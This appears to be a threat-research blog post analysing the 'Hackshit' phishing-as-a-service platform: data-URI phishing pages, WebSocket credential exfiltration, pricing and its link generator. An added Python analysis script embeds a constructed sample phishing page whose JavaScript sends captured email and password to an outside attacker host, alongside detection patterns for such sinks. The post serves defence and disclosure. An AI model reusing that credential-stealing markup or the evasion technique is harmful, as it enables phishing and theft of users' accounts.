Netskope Threat Research Labs recently discovered a Phishing-as-a-Service (PhaaS) platform named Hackshit that records the credentials of victims who fall for its phishing pages. The phishing pages are packaged as base64-encoded data URIs and served from HTTPS websites under the “.moe” top-level domain (TLD) to evade traditional scanners; the “.moe” TLD is intended for ‘the marketing of products or services deemed’ moe. The victim’s credentials are sent to the Hackshit PhaaS platform over WebSockets. The Netskope Active Platform can proactively protect customers by creating custom applications and a policy to block all activity related to Hackshit PhaaS. This blog details the discovery of Hackshit PhaaS, the inner workings of the platform and its revenue model.
Discovery of the PhaaS
During our ongoing research into trends in CloudPhishing attacks, we observed a phishing link that used the data URI scheme to serve base64-encoded HTML (data:text/html;base64), delivered from “https://a.safe.moe”. When the link was accessed, it presented a phishing page imitating Google Docs and asking for credentials, as shown in Figure 1.
Figure 1: First phished page asking for credentials
Once the credentials are entered, the victim is presented with a second phishing page, again served as base64-encoded content via a data URI (data:text/html;base64) from https://a.safe.moe, as shown in Figure 2.
Figure 2: Second Phished page asking for recovery details
The first phishing page was intended to capture the victim’s email credentials, whereas the second was intended to capture the recovery details of the victim’s email account. After the details are entered, the victim is redirected to the genuine Google account recovery page, which makes the interaction look like a legitimate verification step.
We decoded both pages to examine their functionality. Snippets of the first and second decoded pages are shown in Figure 3 and Figure 4.
Figure 3: First decoded phishing page asking for credentials
Figure 4: Second decoded phished page asking for recovery details
As highlighted in the snippets of the decoded pages above, the captured credentials are sent to the attacker over a WebSocket connection to https://pod[.]logshit[.]com and https://pod-1[.]logshit[.]com. Because the exfiltration happens from within the victim’s browser over an encrypted connection rather than through a form submission, it leaves no plain HTTP POST for a network scanner to flag. A sample packet capture is shown in Figure 5.
Figure 5: Network capture to pod[.]logshit[.]com via websocket
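As an added example (not Netskope’s own tooling and not part of the original post), the following Python script shows how an analyst can decode a data:text/html;base64 link like the ones above and list the endpoints to which the decoded page ships captured credentials (WebSocket constructors, form actions, fetch/XHR targets). The HTML it analyzes is constructed for this example; only the hostnames mirror those named in this post, and the script never fetches or connects to anything.

```python
"""Decode a data:text/html;base64 phishing page and pull out its exfiltration endpoints.

Added example, not Netskope tooling. The sample page below is constructed: its markup is
invented, only the hostnames mirror the ones named in this post.
"""
import base64
import re
from urllib.parse import unquote, urlsplit

# Constructed sample page (not the real kit): a fake login form whose submit handler
# streams the credentials over a WebSocket, then redirects to the genuine Google page.
SAMPLE_HTML = b"""<html><body>
<form id="f" action="https://pod-1.logshit.com/collect" method="post">
  <input name="email"><input name="passwd" type="password">
</form>
<script>
  var sock = new WebSocket("wss://pod.logshit.com/ws");
  document.getElementById("f").onsubmit = function () {
    sock.send(JSON.stringify({e: f.email.value, p: f.passwd.value}));
    location = "https://accounts.google.com/signin/recovery";
    return false;
  };
</script></body></html>"""

# The same page packaged the way the kit serves it: as a base64 data URI.
SAMPLE_URI = "data:text/html;base64," + base64.b64encode(SAMPLE_HTML).decode()

_DATA_URI = re.compile(r"^data:(?P<media>[^,;]*)(?P<params>(?:;[^,]*)*),(?P<payload>.*)$", re.S)

# Places a phishing kit typically ships credentials to. Specific sinks come first so a
# URL is reported once with its most precise kind; the generic pattern catches the rest.
_SINKS = [
    ("websocket", re.compile(r"new\s+WebSocket\s*\(\s*['\"](wss?://[^'\"]+)['\"]", re.I)),
    ("form-action", re.compile(r"<form[^>]*\baction\s*=\s*['\"](https?://[^'\"]+)['\"]", re.I)),
    ("fetch", re.compile(r"fetch\s*\(\s*['\"](https?://[^'\"]+)['\"]", re.I)),
    ("xhr", re.compile(r"\.open\s*\(\s*['\"][A-Z]+['\"]\s*,\s*['\"](https?://[^'\"]+)['\"]", re.I)),
    ("other-url", re.compile(r"(?:https?|wss?)://[^'\"\s<>]+", re.I)),
]

# Hosts the page is expected to contact anyway (the post-submit redirect to the real
# Google recovery page). Anything else is a candidate exfiltration endpoint.
_EXPECTED_HOSTS = {"accounts.google.com"}


def decode_data_uri(uri: str) -> bytes:
    """Return the decoded payload of a data: URI (base64 or percent-encoded)."""
    m = _DATA_URI.match(uri.strip())
    if not m:
        raise ValueError("not a data: URI")
    payload = m.group("payload")
    if ";base64" in m.group("params").lower():
        # Kits sometimes strip padding or wrap lines; normalise before decoding.
        payload = re.sub(r"\s+", "", payload)
        payload += "=" * (-len(payload) % 4)
        return base64.b64decode(payload)
    return unquote(payload).encode()


def defang(url: str) -> str:
    """Make a URL non-clickable for reports: pod.logshit.com -> pod[.]logshit[.]com."""
    host = urlsplit(url).hostname or ""
    return url.replace(host, host.replace(".", "[.]"), 1)


def extract_sinks(html: bytes) -> list[tuple[str, str]]:
    """List (kind, defanged URL) for every unexpected network sink in the page source."""
    text = html.decode("utf-8", errors="replace")
    found, seen = [], set()
    for kind, pattern in _SINKS:
        for url in pattern.findall(text):
            host = urlsplit(url).hostname or ""
            if url in seen or host in _EXPECTED_HOSTS:
                continue
            seen.add(url)
            found.append((kind, defang(url)))
    return found


def analyze_phishing_uri(uri: str) -> dict:
    """Decode a data URI and summarise what a triage analyst needs first."""
    html = decode_data_uri(uri)
    sinks = extract_sinks(html)
    text = html.decode("utf-8", errors="replace")
    return {
        "size": len(html),
        "has_password_field": bool(re.search(r"type\s*=\s*['\"]password['\"]", text, re.I)),
        "sinks": sinks,
        "uses_websocket": any(kind == "websocket" for kind, _ in sinks),
    }


if __name__ == "__main__":
    report = analyze_phishing_uri(SAMPLE_URI)
    for kind, url in report["sinks"]:
        print(f"{kind:12s} {url}")
    print("websocket exfiltration:", report["uses_websocket"])
```

Run against a real captured link, the script is a quick way to turn an opaque data: URI into a list of defanged indicators for blocking; the WebSocket constructor check is the one that matters for kits like this, since a scanner that only inspects form actions sees nothing.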
Accessing logshit[.]com led us to the PhaaS website named Hackshit, shown in Figure 6. Further research confirmed that the site operates as a PhaaS platform.
Figure 6: Hackshit web page
Hackshit Phishing as a Service
Hackshit is a PhaaS platform that offers several phishing services and also hosts a marketplace for buying and selling such services.
Related subdomains
VirusTotal passive DNS data shows several domains related to Hackshit, as listed in Figure 7.
Figure 7: Passive DNS of domains related to Hackshit
Hackshit webportal
The Hackshit website featured a video demonstration encouraging users to learn hacking, meet hackers online and make money. The site has a presence on Facebook, Twitter, Instagram and YouTube. The portal allowed users to create a free account and take a free trial of the services offered. The registration page is shown in Figure 8.
Figure 8: Registration page of Hackshit PhaaS
SSL certificate
Hackshit[.]com uses a TLS server certificate issued by Let’s Encrypt, the free, automated and open certificate authority run by the nonprofit Internet Security Research Group (ISRG). The certificate is shown in Figure 9. Note that a valid certificate and a browser padlock only attest that the connection is encrypted to whoever controls the domain; they say nothing about whether the site itself is legitimate.
Figure 9: SSL server certificate of HackShit
The website contained inline manuals, free tutorials, chat support, a comments section, a links/generator tool, logs and a marketplace.
Subscription pricing
Hackshit PhaaS offers several subscription tiers, from Starter to Master, ranging from 40 USD per week to 250 USD for two months, as shown in Figure 10.
Figure 10: Hackshit subscription pricing
Payment modes
Payments are accepted through most common payment methods, as shown in Figure 11.
Figure 11: Hackshit payment modes
Links / Generator
The links/generator option lists several phishing page themes; clicking the ‘Generate’ option below a theme produces a ready-to-use phishing link, as shown in Figure 12.